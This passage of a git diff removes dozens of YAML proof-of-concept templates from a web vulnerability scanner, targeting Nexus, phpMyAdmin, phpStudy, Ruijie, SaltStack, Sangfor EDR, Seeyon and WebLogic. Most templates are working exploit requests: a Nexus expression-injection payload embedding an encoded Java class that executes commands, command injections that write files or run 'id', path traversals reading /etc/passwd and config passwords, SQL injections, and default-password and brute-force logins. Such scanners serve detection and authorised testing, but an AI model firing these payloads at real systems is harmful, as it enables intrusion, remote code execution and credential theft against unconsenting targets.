author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g \ No newline at end of file diff --git a/WebScan/pocs/nexus-cve-2019-7238.yml b/WebScan/pocs/nexus-cve-2019-7238.yml deleted file mode 100644 index 69d5bc4..0000000 --- a/WebScan/pocs/nexus-cve-2019-7238.yml +++ /dev/null 
@@ -1,20 +0,0 @@ -name: poc-yaml-nexus-cve-2019-7238 -set: - r1: randomInt(800000000, 1000000000) - r2: randomInt(800000000, 1000000000) -rules: - - method: POST - path: "/service/extdirect" - headers: - Content-Type: application/json - body: | - {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b01001
64c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c640
1000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002
f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'expr {{r1}} + {{r2}}');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"} - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) -detail: - Affected Version: "nexus<3.15" - author: hanxiansheng26(https://github.com/hanxiansheng26) - links: - - https://github.com/jas502n/CVE-2019-7238 - - https://github.com/verctor/nexus_rce_CVE-2019-7238 - - https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2019-7238 diff --git a/WebScan/pocs/nexus-cve-2020-10199.yml b/WebScan/pocs/nexus-cve-2020-10199.yml deleted file mode 100644 index 7ce9fa7..0000000 
--- a/WebScan/pocs/nexus-cve-2020-10199.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-nexus-cve-2020-10199 -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: POST - path: "/rest/beta/repositories/go/group" - headers: - Content-Type: application/json - body: | - {"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ {{r1}} * {{r2}} }"]}} - expression: | - response.status == 400 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - Affected Version: "nexus<3.21.2" - author: kingkk(https://www.kingkk.com/) - links: - - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb - - https://www.cnblogs.com/magic-zero/p/12641068.html - - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype - - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 diff --git a/WebScan/pocs/nexus-cve-2020-10204.yml b/WebScan/pocs/nexus-cve-2020-10204.yml deleted file mode 100644 index a08a2bb..0000000 --- a/WebScan/pocs/nexus-cve-2020-10204.yml +++ /dev/null 
@@ -1,20 +0,0 @@ -name: poc-yaml-nexus-cve-2020-10204 -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: POST - path: "/extdirect" - headers: - Content-Type: application/json - body: | - {"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{{{r1}}*{{r2}}}"]}],"type":"rpc","tid":28} - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - Affected Version: "nexus<3.21.2" - author: kingkk(https://www.kingkk.com/) - links: - - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb - - https://www.cnblogs.com/magic-zero/p/12641068.html - - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 diff --git a/WebScan/pocs/nexus-default-password.yml b/WebScan/pocs/nexus-default-password.yml deleted file mode 100644 index 5a27c24..0000000 --- a/WebScan/pocs/nexus-default-password.yml +++ /dev/null @@ -1,22 +0,0 @@ -name: poc-yaml-nexus-default-password -rules: - - method: GET - path: /nexus/service/siesta/capabilities - expression: > - response.status == 401 - - method: GET - path: /nexus/service/local/authentication/login - headers: - Accept: application/json - Authorization: Basic YWRtaW46YWRtaW4xMjM= - expression: > - response.status == 200 - - method: GET - path: /nexus/service/siesta/capabilities - expression: > - response.status == 200 -detail: - author: Soveless(https://github.com/Soveless) - Affected Version: "Nexus Repository Manager OSS" - links: - - https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager \ No newline at end of file 
diff --git a/WebScan/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml b/WebScan/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml deleted file mode 100644 index 20a73c0..0000000 --- a/WebScan/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion -rules: - - method: GET - path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd - follow_redirects: false - expression: >- - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: p0wd3r - links: - - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 diff --git a/WebScan/pocs/phpmyadmin-setup-deserialization.yml b/WebScan/pocs/phpmyadmin-setup-deserialization.yml deleted file mode 100644 index 7bf691e..0000000 --- a/WebScan/pocs/phpmyadmin-setup-deserialization.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-phpmyadmin-setup-deserialization -rules: - - method: POST - path: /scripts/setup.php - body: >- - action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} - follow_redirects: false - expression: >- - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: p0wd3r - links: - - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 diff --git a/WebScan/pocs/phpstudy-backdoor-rce.yml b/WebScan/pocs/phpstudy-backdoor-rce.yml deleted file mode 100644 index a8bb748..0000000 --- a/WebScan/pocs/phpstudy-backdoor-rce.yml +++ /dev/null 
@@ -1,19 +0,0 @@ -name: poc-yaml-phpstudy-backdoor-rce -set: - r: randomLowercase(6) - payload: base64("printf(md5('" + r + "'));") -rules: - - method: GET - path: /index.php - headers: - Accept-Encoding: 'gzip,deflate' - Accept-Charset: '{{payload}}' - follow_redirects: false - expression: | - response.body.bcontains(bytes(md5(r))) -detail: - author: 17bdw - Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4" - vuln_url: "php_xmlrpc.dll" - links: - - https://www.freebuf.com/column/214946.html \ No newline at end of file diff --git a/WebScan/pocs/poc-yaml-weblogic-console-weak.yml b/WebScan/pocs/poc-yaml-weblogic-console-weak.yml deleted file mode 100644 index 99b5151..0000000 --- a/WebScan/pocs/poc-yaml-weblogic-console-weak.yml +++ /dev/null @@ -1,29 +0,0 @@ -name: poc-yaml-weblogic-console-weak -sets: - username: - - weblogic - password: - - weblogic - - weblogic1 - - welcome1 - - Oracle@123 - - weblogic123 - payload: - - UTF-8 -rules: - - method: HEAD - path: /console/j_security_check - follow_redirects: false - expression: | - response.status == 302 && response.headers['Set-Cookie'].contains("ADMINCONSOLESESSION") - - method: POST - path: /console/j_security_check - follow_redirects: false - headers: - Content-type: application/x-www-form-urlencoded - body: | - j_username={{username}}&j_password={{password}}&j_character_encoding={{payload}} - expression: | - !response.body.bcontains(b"LoginForm.jsp") -detail: - author: shadown1ng(https://github.com/shadown1ng) \ No newline at end of file diff --git a/WebScan/pocs/pocs.zip b/WebScan/pocs/pocs.zip new file mode 100644 index 0000000..9e8a1be Binary files /dev/null and b/WebScan/pocs/pocs.zip differ diff --git a/WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml b/WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml deleted file mode 100644 index 9bc1287..0000000 --- a/WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml +++ /dev/null 
@@ -1,12 +0,0 @@ -name: poc-yaml-qizhi-fortressaircraft-unauthorized - -rules: - - method: GET - path: >- - /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm - expression: | - response.status == 200 && response.body.bcontains(b"错误的id") && response.body.bcontains(b"审计管理员") && response.body.bcontains(b"事件审计") -detail: - author: we1x4n(https://we1x4n.com/) - links: - - https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw \ No newline at end of file diff --git a/WebScan/pocs/rockmongo-default-password.yml b/WebScan/pocs/rockmongo-default-password.yml deleted file mode 100644 index c0b3566..0000000 --- a/WebScan/pocs/rockmongo-default-password.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-rockmongo-default-password -rules: - - method: POST - path: /index.php?action=login.index&host=0 - body: more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3 - follow_redirects: false - expression: | - response.status == 302 && response.headers["location"] == "/index.php?action=admin.index&host=0" -detail: - author: B1anda0(https://github.com/B1anda0) - links: - - https://www.runoob.com/mongodb/working-with-rockmongo.html \ No newline at end of file diff --git a/WebScan/pocs/ruijie-eg-info-leak.yml b/WebScan/pocs/ruijie-eg-info-leak.yml deleted file mode 100644 index 1150806..0000000 --- a/WebScan/pocs/ruijie-eg-info-leak.yml +++ /dev/null 
@@ -1,24 +0,0 @@ -name: poc-yaml-ruijie-eg-info-leak -rules: - - method: POST - path: /login.php - headers: - Content-Type: application/x-www-form-urlencoded - body: | - username=admin&password=admin?show+webmaster+user - expression: "true" - search: | - {"data":".*?(?P\w+)\s?(?P\w+)","status":1} - - method: POST - path: /login.php - headers: - Content-Type: application/x-www-form-urlencoded - body: | - username={{username}}&password={{password}} - expression: | - response.status == 200 && response.body.bcontains(b"{\"data\":\"0\",\"status\":1}") -detail: - author: Search?=Null - description: "Ruijie EG网关信息泄漏" - links: - - https://mp.weixin.qq.com/s/jgNyTHSqWA5twyk5tfSQUQ \ No newline at end of file diff --git a/WebScan/pocs/ruijie-eg-rce.yml b/WebScan/pocs/ruijie-eg-rce.yml deleted file mode 100644 index 2aac600..0000000 --- a/WebScan/pocs/ruijie-eg-rce.yml +++ /dev/null @@ -1,29 +0,0 @@ -name: poc-yaml-ruijie-eg-rce -set: - r1: randomLowercase(4) - r2: randomLowercase(4) - phpcode: > - "" - payload: base64(phpcode) -rules: - - method: POST - path: "/guest_auth/guestIsUp.php" - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" - Accept-Encoding: "gzip, deflate" - Content-Type: "application/x-www-form-urlencoded; charset=UTF-8" - body: | - ip=127.0.0.1|echo '{{payload}}' | base64 -d > {{r2}}.php&mac=00-00 - expression: | - response.status == 200 - - method: GET - path: "/guest_auth/{{r2}}.php" - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" - Accept-Encoding: "gzip, deflate" - expression: | - response.body.bcontains(bytes(r1)) -detail: - author: White(https://github.com/WhiteHSBG) - links: - - https://xz.aliyun.com/t/9016?page=1 \ No newline at end of file 
diff --git a/WebScan/pocs/ruijie-nbr1300g-cli-password-leak.yml b/WebScan/pocs/ruijie-nbr1300g-cli-password-leak.yml deleted file mode 100644 index e3a3d68..0000000 --- a/WebScan/pocs/ruijie-nbr1300g-cli-password-leak.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-ruijie-nbr1300g-cli-password-leak -rules: - - method: POST - path: /WEB_VMS/LEVEL15/ - follow_redirects: false - headers: - Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - body: | - command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. - expression: | - response.status == 200 && response.body.bcontains(bytes("webmaster level 2 username guest password guest")) -detail: - author: abbin777 - links: - - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html diff --git a/WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml b/WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml deleted file mode 100644 index 579c15e..0000000 --- a/WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-ruijie-rce-cnvd-2021-09650 -set: - r1: randomLowercase(9) -rules: - - method: POST - path: /guest_auth/guestIsUp.php - body: mac = 1 & ip = 127.0.0.1 | id > {{r1}}.txt - follow_redirects: false - expression: | - response.status == 200 - - method: GET - path: /guest_auth/{{r1}}.txt - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"uid") -detail: - author: jdr - info: CNVD-2021-09650(Ruijie-EWEB网管系统 RCE) - links: - - https://github.com/opsxcq/exploit-CVE-2014-6271/ \ No newline at end of file diff --git a/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml b/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml deleted file mode 100644 index 6aa046e..0000000 --- a/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml +++ /dev/null 
@@ -1,11 +0,0 @@ -name: poc-yaml-ruijie-uac-cnvd-2021-14536 -rules: - - method: GET - path: /login.php - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"RG-UAC登录页面") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body) -detail: - author: jweny(https://github.com/jweny) - links: - - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247483972&idx=1&sn=b51678c6206a533330b0279454335065 \ No newline at end of file diff --git a/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml b/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml deleted file mode 100644 index 63f6a1b..0000000 --- a/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml +++ /dev/null @@ -1,22 +0,0 @@ -name: poc-yaml-saltstack-cve-2021-25282-file-write -set: - r1: randomLowercase(5) -rules: - - method: GET - path: /run - follow_redirects: false - expression: | - response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"wheel_async") && response.body.bcontains(b"runner_async") - - method: POST - path: /run - headers: - Content-type: application/json - body: >- - {"eauth":"auto","client":"wheel_async","fun":"pillar_roots.write","data":"{{r1}}","path":"../../../../../../../../../tmp/{{r1}}"} - follow_redirects: false - expression: | - response.status == 200 && response.content_type.icontains("application/json") && "salt/wheel/d*".bmatches(response.body) -detail: - author: jweny(https://github.com/jweny) - links: - - https://www.anquanke.com/post/id/232748 \ No newline at end of file diff --git a/WebScan/pocs/sangfor-edr-arbitrary-admin-login.yml b/WebScan/pocs/sangfor-edr-arbitrary-admin-login.yml deleted file mode 100644 index 43debed..0000000 --- a/WebScan/pocs/sangfor-edr-arbitrary-admin-login.yml +++ /dev/null 
@@ -1,13 +0,0 @@ -name: poc-yaml-sangfor-edr-arbitrary-admin-login -rules: - - method: GET - path: /ui/login.php?user=admin - follow_redirects: false - expression: > - response.status == 302 && - response.body.bcontains(b"/download/edr_installer_") && - response.headers["Set-Cookie"] != "" -detail: - author: hilson - links: - - https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA diff --git a/WebScan/pocs/sangfor-edr-cssp-rce.yml b/WebScan/pocs/sangfor-edr-cssp-rce.yml deleted file mode 100644 index 4dafccb..0000000 --- a/WebScan/pocs/sangfor-edr-cssp-rce.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-sangfor-edr-cssp-rce -rules: - - method: POST - path: /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 - headers: - Content-Type: application/x-www-form-urlencoded - body: >- - {"params":"w=123\"'1234123'\"|id"} - expression: > - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uid=0(root)") -detail: - author: x1n9Qi8 - Affected Version: "Sangfor EDR 3.2.17R1/3.2.21" - links: - - https://www.cnblogs.com/0day-li/p/13650452.html diff --git a/WebScan/pocs/sangfor-edr-tool-rce.yml b/WebScan/pocs/sangfor-edr-tool-rce.yml deleted file mode 100644 index 5a97ff7..0000000 --- a/WebScan/pocs/sangfor-edr-tool-rce.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-sangfor-edr-tool-rce -set: - r1: randomLowercase(8) - r2: randomLowercase(8) -rules: - - method: GET - path: "/tool/log/c.php?strip_slashes=printf&host={{r1}}%25%25{{r2}}" - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - author: cookie - links: - - https://edr.sangfor.com.cn/ diff --git a/WebScan/pocs/seeyon-a6-employee-info-leak.yml b/WebScan/pocs/seeyon-a6-employee-info-leak.yml deleted file mode 100644 index b655ab7..0000000 --- a/WebScan/pocs/seeyon-a6-employee-info-leak.yml +++ /dev/null 
@@ -1,11 +0,0 @@ -name: poc-yaml-seeyon-a6-employee-info-leak -rules: - - method: GET - path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 - expression: - response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet") -detail: - author: sakura404x - version: 致远A6 - links: - - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md \ No newline at end of file diff --git a/WebScan/pocs/seeyon-a6-test-jsp-sql.yml b/WebScan/pocs/seeyon-a6-test-jsp-sql.yml deleted file mode 100644 index fde5f2a..0000000 --- a/WebScan/pocs/seeyon-a6-test-jsp-sql.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-seeyon-a6-test-jsp-sql -set: - rand: randomInt(200000000, 210000000) -rules: - - method: GET - path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}})) - expression: - response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) -detail: - author: sakura404x - version: 致远A6 - links: - - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3346.md \ No newline at end of file diff --git a/WebScan/pocs/seeyon-ajax-unauthorized-access.yml b/WebScan/pocs/seeyon-ajax-unauthorized-access.yml deleted file mode 100644 index 92ce028..0000000 --- a/WebScan/pocs/seeyon-ajax-unauthorized-access.yml +++ /dev/null 
@@ -1,16 +0,0 @@ -name: poc-yaml-seeyon-ajax-unauthorized-access -rules: - - method: GET - path: /seeyon/thirdpartyController.do.css/..;/ajax.do - expression: | - response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null")) - - method: GET - path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile - expression: | - response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json") - -detail: - author: x1n9Qi8 - links: - - https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA - - https://buaq.net/go-53721.html diff --git a/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml b/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml deleted file mode 100644 index f6373ff..0000000 --- a/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-seeyon-cnvd-2020-62422-readfile -rules: - - method: GET - path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties - follow_redirects: false - expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password") -detail: - author: Aquilao(https://github.com/Aquilao) - info: seeyon readfile(CNVD-2020-62422) - links: - - https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422 diff --git a/WebScan/pocs/seeyon-session-leak.yml b/WebScan/pocs/seeyon-session-leak.yml deleted file mode 100644 index 4722203..0000000 --- a/WebScan/pocs/seeyon-session-leak.yml +++ /dev/null 
@@ -1,10 +0,0 @@ -name: poc-yaml-seeyon-session-leak -rules: - - method: GET - path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll - expression: - response.status == 200 && response.body.bcontains(b"\r\n\r\n") -detail: - author: sakura404x - links: - - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3345.md \ No newline at end of file diff --git a/WebScan/pocs/seeyon-setextno-jsp-sql.yml b/WebScan/pocs/seeyon-setextno-jsp-sql.yml deleted file mode 100644 index 84b6acb..0000000 --- a/WebScan/pocs/seeyon-setextno-jsp-sql.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-seeyon-setextno-jsp-sql -set: - rand: randomInt(200000000, 210000000) -rules: - - method: GET - path: /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20union%20all%20select%201,2,@@version,md5({{rand}})%23 - expression: - response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) -detail: - author: sakura404x - version: 致远A6 - links: - - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3348.md \ No newline at end of file diff --git a/WebScan/pocs/seeyon-unauthoried.yml b/WebScan/pocs/seeyon-unauthoried.yml deleted file mode 100644 index a0777ec..0000000 --- a/WebScan/pocs/seeyon-unauthoried.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-seeyon-unauthoried -rules: - - method: POST - path: "/seeyon/thirdpartyController.do" - expression: "true" - body: | - method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4 - search: >- - JSESSIONID=(?P.+?) - - method: GET - path: "/seeyon/main.do" - headers: - Cookie: JSESSIONID={{session}} - expression: | - response.status == 200 && response.body.bcontains(b"当前已登录了一个用户,同一窗口中不能登录多个用户") -detail: - author: whami-root(https://github.com/whami-root) - links: - - https://github.com/whami-root \ No newline at end of file 
